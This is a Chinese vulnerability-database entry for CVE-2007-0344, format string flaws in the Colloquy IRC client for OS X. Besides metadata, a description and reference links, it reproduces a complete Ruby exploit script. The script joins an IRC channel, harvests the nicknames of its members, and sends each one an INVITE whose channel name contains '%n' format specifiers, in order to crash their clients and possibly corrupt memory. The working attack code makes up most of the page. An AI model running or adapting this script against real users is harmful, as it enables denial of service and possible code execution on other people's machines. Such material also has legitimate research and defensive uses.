Colloquy INVITE Request 多个格式化字符串漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112034 漏洞类型 格式化字符串
发布时间 2007-01-17 更新时间 2007-08-07
CVE编号 CVE-2007-0344 CNNVD-ID CNNVD-200701-283
漏洞平台 OSX CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3139
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-283
|漏洞详情
Colloquy2.1及之前版本的(1)_invitedToRoom:和(2)_invitedToDirectChat:中存在多个格式化字符串漏洞。远程攻击者可以借助INVITE请求的频道名中的格式化字符串分类符,引起拒绝服务攻击(应用程序崩溃)以及可能执行任意代码。该漏洞与在AppleAppKit中对AlertSheet和AlertPanel的执行有关。
|漏洞EXP
#!/usr/bin/ruby
# (c) Copyright 2006 Lance M. Havok <lmh@info-pull.com>
#
# Makes use of the Colloquy INVITE format string vulnerability.
#

require 'socket'

target_channel  = (ARGV[0] || "#whatever")
target_server   = (ARGV[1] || "irc.server.org")
target_port     = (ARGV[2] || 6667)

rand_nick       = "spongebo"
channel_joined  = false
ready_to_go     = false
abuse_attempts  = 2
chan_fmtstring  = ("#%n%n%n%n") # develop payload when feeling like it.
target_furries = []

irc_socket = TCPSocket.new(target_server, target_port.to_i)

irc_socket.print "USER #{rand_nick} localhost localhost r\n"
irc_socket.print "NICK #{rand_nick}\r\n"
while true
  s = irc_socket.gets
  case s.strip
    when /^PING :(.+)$/i
      puts "++ PING..."
      irc_socket.send "PONG :#{$1}\n", 0
      puts "++ PONG."
    when /^:(.+?)!(.+?)@(.+?)\sPRIVMSG\s.+\s:[\001]PING (.+)[\001]$/i
      puts "++ CTCP PING from #{$1}!#{$2}@#{$3}"
      irc_socket.send "NOTICE #{$1} :\001PING #{$4}\001\n", 0
    when /^:(.+?)!(.+?)@(.+?)\sPRIVMSG\s.+\s:[\001]VERSION[\001]$/i
      puts "++ CTCP VERSION from #{$1}!#{$2}@#{$3}"
      irc_socket.send "NOTICE #{$1} :\001VERSION Unabomber v0.011\001\n", 0
    when /n=(.+) (.+) (.+) (.+) (.+) (.*)$/i
      nickarr = s.scan(/n=(.+) (.+) (.+) (.+) (.+) (.*)/).flatten

      if nickarr.size > 3
        if nickarr[2].size > 2 and nickarr[2] != target_server
          nickarr = nickarr[2]
        elsif nickarr[1].size > 2 and nickarr[1] != target_server
          nickarr = nickarr[1]
        elsif nickarr[3].size > 2 and nickarr[3] != target_server
          nickarr = nickarr[3]
        end
        
        target_furries << nickarr
      end
    else
      unless channel_joined
        #irc_socket.send "JOIN #{target_channel}\n", 0 (uncomment to join channel)
        irc_socket.send "JOIN #{chan_fmtstring}\n", 0
        channel_joined = true
      end
      
      if channel_joined and abuse_attempts != 0
        irc_socket.send "WHO #{target_channel}\n", 0
        abuse_attempts -= 1
      end

      # we need to throttle the pwnage or server will kick our ass
      if target_furries.size > 1
        target_furries.each do |zealot|
          puts "++ Pwning #{zealot}"
          irc_socket.send "INVITE #{zealot} #{chan_fmtstring}\n", 0
          sleep 1
        end
      end
  end
end

# milw0rm.com [2007-01-17]
|参考资料

来源:BID
名称:22086
链接:http://www.securityfocus.com/bid/22086
来源:SECUNIA
名称:23801
链接:http://secunia.com/advisories/23801
来源:OSVDB
名称:32688
链接:http://www.osvdb.org/32688
来源:VUPEN
名称:ADV-2007-0238
链接:http://www.frsirt.com/english/advisories/2007/0238
来源:MISC
链接:http://projects.info-pull.com/moab/MOAB-16-01-2007.html
来源:MILW0RM
名称:3139
链接:http://milw0rm.com/exploits/3139